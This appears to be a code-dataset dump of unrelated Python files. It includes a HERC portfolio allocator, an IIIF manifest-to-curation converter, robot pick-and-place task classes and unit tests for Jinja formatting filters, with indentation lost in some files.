| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
    # Return the common elements as a flat list so the result can be compared
    # against a sorted cluster membership list in compute_allocation().
    intersec = list(set(list1) & set(list2))
    return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w | en | 0.613924 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- Created on Tue Aug 31 22:48:21 2021 @author: apple #HERC #Dataframe of returns #Need to first calculate the optimal number of clusters #The mat_ret that goes into this must be a np array of returns # correl_mat = mat_ret.corr(method='pearson') | 2.066397 | 2 |
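
HERC() above takes a DataFrame of asset returns (one column per asset) and hands back a pandas Series of weights re-indexed by the original column names. A usage sketch with synthetic returns is shown below; it assumes the function and its helper imports (HRP, backtest, gap_statistic) are importable, and the gap-statistic search over cluster counts can be slow for large inputs.

import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
returns = pd.DataFrame(rng.normal(0.0, 0.01, size=(250, 5)),
                       columns=['AAA', 'BBB', 'CCC', 'DDD', 'EEE'])

weights = HERC(returns)   # Series of allocations keyed by ticker
print(weights.round(4))
print(weights.sum())      # recursive bisection keeps the weights summing to ~1
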
src/conv/convertManifest2Curation.py | nakamura196/i3 | 3 | 8033 | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| en | 0.766672 | # time.sleep(0.5) | 2.621495 | 3 |
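
Every curation file written by the script has the same shape: a cr:Curation whose single selection holds one member per annotation, with the annotation text copied into description and metadata. A small sketch of reading those files back (using the same hard-coded output directory as the script) might look like this:

import glob
import json

curation_dir = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"

for path in glob.glob(curation_dir + "*.json"):
    with open(path) as f:
        curation = json.load(f)
    members = curation["selections"][0]["members"]
    print(path, "-", len(members), "annotations")
    for member in members[:3]:
        print("  ", member["label"], member["description"][:40])
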
programme.py | GaLaXy102/Vacationing | 0 | 8034 | <reponame>GaLaXy102/Vacationing
from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("")
| from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("") | none | 1 | 2.049516 | 2 |
|
sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 0 | 8035 | import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
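        # NOTE: the unconditional 'return True' below short-circuits this check,
        # leaving the distance-to-goal test underneath as dead code.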
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
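        # NOTE: the unconditional 'return True' below short-circuits this check,
        # leaving the distance-to-goal test underneath as dead code.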
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| en | 0.949899 | Task to pick up an object with the robot gripper. Success condition: - Object is grasped and has been lifted above the table Task to pick up an object with the robot gripper. Success condition: - Object is grasped and has been lifted above the table Task to place object at a desired location. Task to pick up an object and place the object at a desired location. Success condition: - Object is grasped and has been lifted above the table | 2.570647 | 3 |
tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | 0 | 8036 | <reponame>nealedj/eq-survey-runner
# coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
# Given no test for integers this check was removed from jinja_filters
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
